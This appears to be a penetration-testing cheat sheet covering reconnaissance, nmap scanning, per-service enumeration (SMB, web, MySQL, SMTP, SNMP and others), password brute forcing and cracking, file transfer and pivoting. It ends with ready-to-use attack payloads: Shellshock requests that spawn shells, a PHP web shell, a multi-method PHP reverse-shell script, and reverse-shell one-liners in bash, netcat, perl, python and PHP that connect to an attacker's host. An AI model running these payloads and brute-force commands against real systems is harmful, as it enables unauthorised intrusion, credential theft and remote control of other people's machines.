Pre-engagement
Log all commands of the current session
script engagement_x.log
...
exit # when finished
Use keepnote or other to document findings
Create a screenshot of the selected area and save it at home directory
$ alias ss='import ~/ss-$(date +%F_%H%M_%S).png'
Set the Target IP Address to the $ip system variable
$ export ip=target_ip
General methodology
For every open port TCP/UDP
Find service and version
Find known service bugs
Find configuration issues
Run nmap port scan / banner grabbing
Google
Every error message
Every URL path
Every parameter to find versions/apps/bugs
Run metasploit enum
Run nmap vuln scan
Run all steps of each service below
searchsploit every service
Google
Every version exploit db
Every version vulnerability
Run metasploit exploits
If app has auth:
User enumeration
Password bruteforce
Default credentals google search
If everything fails try:
$ nmap --script exploit -Pn $ip
DNS
Find name servers
$ host -t ns guif.re
Find email servers
$ host -t mx guif.re
Subdomain bruteforcing
$ for ip in $(cat list.txt); do host $ip.guif.re; done
Reverse dns lookup bruteforcing
$ for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
Zone transfer request
$ host -l guif.re ns1.guif.re
$ dnsrecon -d guif.re -t axfr
Finds nameservers for a given domain
$ host -t ns guif.re | cut -d " " -f 4 #
$ dnsenum guif.re
Nmap zone transfer scan
$ nmap guif.re --script=dns-zone-transfer -p 53
Finds the domain names for a host.
$ whois guif.re
Find the IP and authoritative servers.
$ nslookup guif.re
Finds missconfigure DNS entries.
$ host -t ns guif.re
TheHarvester finds subdomains in google, bing, etc
$ python theHarvester.py -l 500 -b all -d guif.re
Port scanning
Automated:
#!/bin/bash
nmap $1 -F # first, quick scan
nmap -sV -A -O -T4 -sC $1 # verify services, Os, run scripts
nmap -p 1-65535 -T5 -sT $1 # scan all ports TCP
nmap -p 1-10000 -T4 -Su $1 # UDP scan
Scan all 65536 ports TCP/UDP, nmap does only 1000 first ports by default
Find hosts alive
nmap -sP 192.168.0.1/24
Open ports scan (slow)
$ nmap -p 1-65535 -T4 -sS $ip
Services finding enumeartion
$ sudo nmap -sV -A -O -T4 $ip
3way handshake scan
$ nmap -nvv -w 1 IP 22-8
UDP scan
$ nmap -nvv -sU -w 1 $ip 22-81
UDP scanning consists on sending an empty UDP packet. Open: reply back. Closed: ICMP unreachable packet is received
ARP Scan
$ arp-scan 10.10.10.1/28 -I eth0
Nmap ping scan
$ sudo nmap -sn -oA nmap_pingscan 10.10.10.1/24
Nmap SYN/Top 100 ports Scan
$ nmap -sS -F -oA nmap_fastscan 10.10.10.1/24
Services versions scan
$ nmap -sV $ip
Run the default scripts and normal port scan against all the found ports
$ nmap -sC $ip
Run all nmap scan scripts against found ports.
$ nmap -Pn -sV -O -pT:{TCP ports found},U:{UDP ports found} --script *vuln* $ip
Port scan with file report:
$ nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA /root/192_168_15_201T 192.168.15.201
Full vulnerability scanning:
$ mkdir /usr/share/nmap/scripts/vulnscan; cd /usr/share/nmap/scripts/vulnscan; git clone https://github.com/scipag/vulscan.git; nmap -sS -sV --script=/usr/share/nmap/scripts/vulnscan/vulscan.nse $ip
Identify unknown services
$ amap -d $ip <port>
SMB
Versions 1,2,3. TCP 139, 445 and many UDP ports.
Enumeration
$ nmblookup -A $ip
$ enum4linux -a $ip
Versions Samba 2.2.x are red flag
A null SMB session can be used to gather passwords and useful information from SMB 1.
Null session and extract information.
$ nbtscan -r $ip
Version
msfconsole; use scanner/smb/smb_version; set RHOSTS $ip; run
MultiExploit
msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run
Quick enum:
$ nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip
Quick vuln scan:
$ nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip
Full enum and vuln scanning:
$ nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
Full enum & vuln scan:
$ nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip
Mount:
$ smbclient //$ip/share -U username
Anonymous mount:
$ smbclient //$ip/share # hit enter with blank password
Worth testing eternalblue
Bruteforce
$ hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb
Any metasploit exploit through Netbios over TCP in 139, you need to set:
> set SMBDirect false
Netbios
Dumping the netbios table:
$ nmap -Pn -sUC -p137 $ip
NFS
Show all mounts
$ showmount -e $ip
Mount a NFS share
$ mount $ip:/vol/share /mnt/nfs
Web
$ nikto -host $ip
$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web_Content/Top1000-RobotsDisallowed.txt; gobuster -u http://$ip -w Top1000-RobotsDisallowed.txt
$ wfuzz -c -z list.txt --sc 200 http://$ip
Directory discovery
$ dirb $ip /usr/share/wordlists/dirb/common.txt
$ gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
$ gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
$ gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e
$ cd /root/dirsearch; python3 dirsearch.py -u http://$ip/ -e .php
Banner grabbing
./whatweb $ip # identifies all known services
Methods testing
$ nmap --script http-methods --script-args http-methods.url-path='/test' $ip
Bruteforcing authentication
$ hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin
Vulnerability scanning:
$ nikto -host http://$ip
$ nmap --script=http-vuln* $ip
Test against SQLI
sqlmap -u "http://$ip/?query" --data="user=foo&pass=bar&submit=Login" --level=5 --risk=3 --dbms=mysql
Coldfusion vulnerability scanning
$ nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip
Bruteforce basic auth
$ hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
WebDav
test
$ davtest -move -sendbd auto -url http://$ip:8080/webdav/
$ cadaver http://$ip:8080/webdav/
Mysql
$ nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306
Nmap scan
$ nmap -sV -Pn -vv -script=mysql* $ip -p 3306
Vuln scanning:
$ sqlmap -u 'http://$ip/login-off.asp' --method POST --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all
If Mysql is running as root and you have acces, you can run commands:
mysql> select do_system('id');
mysql> \! sh
MsSql
Enumerate MSSQL Servers on the network
msf > use auxiliary/scanner/mssql/mssql_ping
$ nmap -sU --script=ms-sql-info $ip
Bruteforce MsSql
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
Gain shell using gathered credentials
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
Log in to a MsSql server:
# root@kali:~/dirsearch# cat ../.freetds.conf
[someserver]
host = $ip
port = 1433
tds version = 8.0
user=sa
root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME
Redis
Enumerate:
$ nmap -p6379 --script redis-info $ip
Client:
$ redis-cli -h $ip
Memcached
Enumerate:
$ nmap -p11211 --script memcached-info $ip
Extract data:
msf > use auxiliary/gather/memcached_extractor
SMTP
Always do users enumeration
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
>use auxiliary/scanner/smtp/smtp_enum
Command to check if a user exists
>VRFY root
Command to ask the server if a user belongs to a mailing list
>EXPN root
Enumeration and vuln scanning:
$ nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
Bruteforce
$ hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
Metasploit user enumeration
use auxiliary/scanner/smtp/smtp_enum
Testing for open relay
telnet $ip 25
EHLO root
MAIL FROM:[email protected]
RCPT TO:[email protected]
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT
RPC (135)
Enumerate, shows if any NFS mount exposed:
$ rpcinfo -p $ip
$ nmap $ip --script=msrpc-enum
msf > use exploit/windows/dcerpc/ms03_026_dcom
FTP enumeration
Enumerate:
$ nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
Bruteforce
$ hydra -l user -P /usr/share/john/password.lst ftp://$ip:21
Bruteforce with metasploit
$ msfconsole -q
msf> search type:auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login
Vuln scan
$ nmap --script=ftp-* -p 21 $ip
TFTP
If unathenticated access is allowed with write permissions you can upload a shell:
$ tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]
SSH
User enumeration
msf > use auxiliary/scanner/ssh/ssh_enumusers
$ python /usr/share/exploitdb/platforms/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
Bruteforce
$ hydra -v -V -l root -P password-file.txt $ip ssh
With list of users:
$ hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 192.168.33.251 ssh
You can use *-w* to slow down
SSL
Open a connection
$ openssl s_client -connect $ip:443
Basic SSL ciphers check
$ nmap --script ssl-enum-ciphers -p 443 $ip
Look for unsafe ciphers such as Triple-DES and Blowfish
Very complete tool for SSL auditing is testssl.sh, finds BEAST, FREAK, POODLE, heart bleed, etc...
Simple Network Management Protocol (SNMP)
It is a network protocol used for collecting organizing and exchanging information between network devices
Runs on managed switches, routers, and server OSs for monitoring purposes. SNMP is accessed upon providing a valid community string within a UDP datagram to port 161. It is usually public. Versions 1,2 and 3. You can see running processes, open ports, users, windows version, installed software.
Enumeration
$ for community in public private manager; do snmpwalk -c $community -v1 $ip; done
$ snmpwalk -c public -v1 $ip
$ snmpenum $ip public windows.txt
Less noisy:
$ snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25
Based on UDP, stateless and susceptible to UDP spoofing
$ nmap -sU --open -p 16110.1.1.1-254 -oG out.txt
$ snmpwalk -c public -v1 10.1.1.1 # we need to know that there is a community called public
$ snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users
$ snmpwalk 5c public 5v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes
$ nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip
$ snmp-check -t $ip -c public
Bruteforce the community names:
$ onesixtyone -c dict.txt -i $ip
Against cisco:
use auxiliary/scanner/snmp/cisco_config_tftp
POP3
Test authentication:
telnet $ip 110
USER uer@$ip
PASS admin
list
retr 1
Finger
Users enumeration
$ finger-user-enum.pl -U users.txt -t $ip
RDP
Bruteforce
$ ncrack -vv --user administrator -P password-file.txt rdp://$ip
$ hydra -t 4 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
RPC
Enum
$ nmap $ip --script=msrpc-enum
Exploit:
msf > use exploit/windows/dcerpc/ms03_026_dcom
Kerberos
Test MS14-068
LDAP
Enumeration:
$ ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com"
Kerberos
Runs on port 88, password management port 464.
Passive network sniffing:
$ kerbcrack
User enumeration:
$ nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=research $ip
Memory password extraction (pass the ticket):
$ Mimikatz
Email addresses enumeration
Find emails in google, bing, pgp etc
$ theharvester -d $ip -b google
Contact information for the domains they host
$ whois $ip
Find emails and employee name with Recon-ng:
$ recon-ng; use module; set DOMAIN $ip; run;
recon/contacts/gather/http/api/whois_pocs
Find xss published ad xssed.co
recon/hosts/enum/http/web/xssed
Find subdomain
recon/hosts/gather/http/web/google_site
Finds IPs close to the domain and possible new domains
recon/hosts/gather/http/web/ip_neighbor
Google search
site:xxx -site:www.xxx
filetype: look for specific documents, pdf, docx, etc..
inurl
intitle
Others https://www.exploit-db.com/google-hacking-database/
Vulnerability scanning
Search services vulnerabilities
$ searchsploit --exclude=dos -t apache 2.2.3
$ msfconsole; > search apache 2.2.3
$ nmap -v -T4 --script="*-vuln-*" $ip
nmap has many vulnerability scanning NSE scripts in /usr/share/nmap/scripts/
OpenVAS
Powerful vulnerability scanner with thousands of scan checks. Setup:
$ openvas-setup; openvas-adduser; gsd
Password cracking
MD5 32 hex characters.
SHA-1 40 hex characters.
SHA-256 64 hex characters.
SHA-512 128 hex characters.
Find the type of hash:
$ hash-identifier
Find hash type at https://hashkiller.co.uk
Running john will tell you the hash type even if you don't want to crack it:
$ john hashes.txt
Paste the entire /etc/shadow in file and run
$ john hashes.txt
Paste the entire /etc/shadow in file and run
$ john hashes.txt
GPU cracking:
$ hashcat -m 500 -a 0 -o output.txt -remove hashes.txt /usr/share/wordlists/rockyou.txt
CPU cracking:
$ john --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump
Cracking */etc/shadow*:
$ unshadow /etc/passwd /etc/shadow /tmp/combined; john --wordlist=<any word list> /tmp/combined
Generating wordlists
$ crunch 6 6 0123456789ABCDEF 5o crunch1.txt
Online rainbow tables:
https://crackstation.net/
http://www.cmd5.org/
http://crackhash.com/
https://hashkiller.co.uk/md5-decrypter.aspx
https://www.onlinehashcrack.com/
http://rainbowtables.it64.com/
http://www.md5online.org/
Transfering files
First step after gaining access to a remote machine is to upload new tools.
Linux tools: netcat, curl, wget
Windows: ftp, tftp, power shell script to echo and write.
Download file with curl:
$ curl -O http://host/file
Upload a file with put:
$ curl --upload-file shell.php --url http://$ip/shell.php --http1.0
Start a web server in your local machine serving files within the current folder:
$ python -m SimpleHTTPServer
$ php -S $ip:80
Send files using different commands:
$ nc -nlvp 4444 > incoming.exe
As an FTP server, metasploit has built in one:
use auxiliary/server/ftp
auxiliary/server/tftp
SMB share server:
python smbserver.py WORKSPACE /dir
Curl put:
$ curl -T 'file' 'http://$ip'
Linux, mounting a samba share:
smbclient -L 1.1.1.1 --no-pass
Shellshock
The following tool will test it.
$ git clone https://github.com/nccgroup/shocker; cd shocker; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose
You can also:
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80
$ curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" $ip/cgi-bin/status
Shellshock over SSH:
$ ssh username@$ip '() { :;}; /bin/bash'
HeartBleed
Test web server
$ sslscan $ip:443
Tunneling your traffic through another host
$ sshuttle -r root@$ip 10.10.10.0/24
Port forwarding
Simplest type of traffic redirection, consists on accepting traffic from one address and port port and redirecting it to another address and port.
It can be useful to bypass address and port based filters. Rinetd is a linux tool to do it.
Local port forwarding
Creates an encrypted tunnel through two machines and have traffic redirected to a final host and port, similar to port forwarding This is useful when you are trying to connect from your machine to a destination using a gateway. The syntax is:
$ ssh gateway_host -L local_port:remote_host:remote_port
You can later create a SSH session to the local port and have and SSH tunneled to destination:
$ ssh hop_machine -L 31337:banned_machine:22
$ ssh -p 31337 localhost
Remote port forwarding
It creates a tunnel from the target machine to your local machine, which allows connecting to an arbitrary port on the target. Useful if the target is in a non-routable network from your local machine. This is useful when you are trying to connect to a host, behind a firewall that blocks incoming connections. This technique works as the previous one, but the connection is started from the gateway. The syntax is:
$ ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic Port Forwarding
Allows to create a tunnel from the target to your machine, and have the traffic routed to any host through target. You can configure a local port to forward traffic to multiple destinations passing through a single host. It is similar to local port forwarding but allows multiple destinations. It uses the SOCKS protocol. The syntax is:
$ ssh -D local_port remote_add
The connection of the previous command is established at port 22 of remote addr.
Pivoting
1. drop 3proxy.exe
2. Set up a config file:
allow *_
internal IP_SAME_NETWORK
external IP_OTHER_NETWORK
socks -p1081
3. Add to */etc/proxychains.conf*:
socks4 IP_SAME_NETWORK 1081
4. Scan:
$ proxychains nmap -sT -Pn IP_OTHER_NETWORK-250 --top-ports=5
Double-pivoting
Pivoting through two different networks:
First, create a dynamic port forwarding through the first network:
$ ssh -f -N -D 9050 [email protected]
Edit */etc/proxychains.conf* and add as default gateway:
socks4 127.0.0.1 9050
Use the proxy to create a second dynamic port forward to the second network:
$ proxychains ssh -f -N -D 10050 [email protected] -p 22
Edit again */etc/proxychains.conf* and add as default gateway:
socks4 127.0.0.1 10050
You can now use proxychains to pivot to the target network:
$ proxychains nmap -sTV -n -PN 10.1.2.1 -254
CVEs
http://www.cvedetails.com/
https://www.exploit-db.com/
Internet explorer 6
Vulnerable to msf exploit(ms10_002_aurora)
Lists
/usr/share/seclists/
/usr/share/wordlist/
/usr/share/metasploit-framework/data/wordlists/
Minimal web server
$ for i in 1 2 3 4 5 6 7; do echo -e '200 OK HTTP/1.1\r\nConnection:close\r\n\r\nfoo\r\n' |nc -q 0 -klvvp 80; done
Shells
PHP
<?php echo '<pre>'; echo shell_exec($_GET['cmd']); echo '</pre>'; ?>
Kali shells
/usr/share/webshells/...
/usr/share/webshells/php/php-reverse-shell.php
Reverse shells
If connections drops or can not be established, try different ports 80,443,8080...
Best PHP reverse shell:
<?php
echo 'running shell';
$ip='YOUR_IP';
$port='YOUR_PORT';
$reverse_shells = array(
'/bin/bash -i > /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1',
'0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196',
'/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash',
'nc.exe -nv '.$ip.' '.$port.' -e cmd.exe',
"/usr/bin/perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"".$ip.":".$port."\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
'rm -f /tmp/p; mknod /tmp/p p && telnet '.$ip.' '.$port.' 0/tmp/p',
'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''
);
foreach ($reverse_shells as $reverse_shell) {
try {echo system($reverse_shell);} catch (Exception $e) {echo $e;}
try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;}
try {exec($reverse_shell);} catch (Exception $e) {echo $e;}
}
system('id');
?>
Using netcat
nc <attacker_ip> <port> -e /bin/bash
Using bash and TCP sockets
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
Using sh and TCP sockets
0<&196;exec 196<>/dev/tcp/<attacker_ip>/<port>; sh <&196 >&196 2>&196
Using telnet
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
PHP and sh
php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
Perl and sh
perl -e 'use Socket;$i="<attacker_ip>";$p=<port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl forking:
$ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Reverse shell with python script:
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP",port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Proxy
Protocols
http://
http://
connect://
sock4://
sock5://
PPTP
Point-to-Point Tunneling Protocol provides remote access to mobile devices, uses TCP port 1723 for key exchange and IP protocol 47 (GRE) to encrypt data between peers.
Enumeration:
$ nmap –Pn -sSV -p1723 $ip
Bruteforce:
$ cat dic.txt | thc-pptp-bruter –u admin $ip
IPsec
Tries to solve the confidentiality/integrity problems of the IP protocol. It provides HMAC of the origin and encrypts data.
You can find hosts supporting Ipsec with:
$ ike-scan -q $iprange
Validate the follow:
DH group can be insecure, allowing passive decryption.
Preshared key (PSK) might be cracked.
Obtaining the XAUTH once the PSK is known.
For more info, refer to https://www.trustwave.com/Resources/SpiderLabs-Blog/Cracking-IKE-Mission-Improbable-(Part-1)/.
TLS
Enumerating supported protocols and cipher suites
$ python prober.py $ip
Enumerating supported features and extensions
$ nmap --script ssl-enum-ciphers -p443
Certificate review
$ nmap -p443 --script ssl-cert
You should validate that:
The X.509 subject common name (CN) is correct for the service
The issuer is reputable and certificate chain valid
RSA or DSA public key values are longer than 2,048 bits
DH public parameters are longer than 2,048 bits
The certificate is valid and has not expired
The certificate is signed using SHA-256
Vulnerabilities:
POODLE against CBC mode ciphers within SSL 3.0
BEAST against CBC mode ciphers via TLS 1.0
Byte biases in RC4 ciphers across all SSL and TLS protocol versions
Validate if the key was generated with weak entropy:
$ nmap -p443 --script ssl-known-key $1
Test failback:
$ openssl s_client -connect $ip -no_tls1_2 -fallback_scsv
Test Dos:
$ thc-ssl-dos $ip